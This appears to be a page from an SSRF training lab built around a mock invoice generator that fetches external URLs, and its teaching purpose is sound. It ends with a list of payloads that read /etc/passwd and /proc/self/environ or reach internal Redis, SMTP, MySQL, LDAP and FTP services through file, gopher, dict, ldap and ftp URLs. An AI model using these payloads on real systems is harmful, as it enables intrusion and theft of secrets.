Bug Bounty Tip: DocuGen fetches external content for your documents. URL format is validated, but any reachable destination is permitted — including internal services, file://, and cloud metadata endpoints.
Invoice #INV-2024-001 Draft
From
Acme Accounting LLC
123 Finance Street
New York, NY 10001
To
Acme Corp
456 Business Ave
San Francisco, CA 94102
Item Qty Rate Amount
Web Design Services 1 $2,500.00 $2,500.00
Hosting — Annual 1 $480.00 $480.00
Consulting — 10 Hours 10 $150.00 $1,500.00
Total $4,480.00
Add External Content
DocuGen will fetch and preview the content before embedding it into the document.
Fetched Content
Terms of Service
legal.example.com · 2024-06-01 11:16:05
Fetched
Company Logo
cdn.example.com · 2024-06-01 11:15:22
Fetched
Where Bug Hunters Find This
  • Invoice / receipt generators (FreshBooks, QuickBooks, Stripe)
  • Website-to-PDF converters (wkhtmltopdf, WeasyPrint as a service)
  • Report builders with embedded content (Tableau, Power BI)
  • Document signing platforms fetching terms of service
  • Marketing automation fetching landing pages
  • Chatbot / AI tools fetching web content
Protocol Bypass Techniques
file:// Protocol
file:///etc/passwd
file:///proc/self/environ
gopher:// Protocol
gopher://127.0.0.1:6379/_INFO (Redis)
gopher://127.0.0.1:25/_HELO (SMTP)
dict:// Protocol
dict://127.0.0.1:3306/info (MySQL fingerprint)
ldap:// Protocol
ldap://127.0.0.1:389/dc=internal (directory enum)
ftp:// Protocol
ftp://anonymous@127.0.0.1:21/ (internal FTP)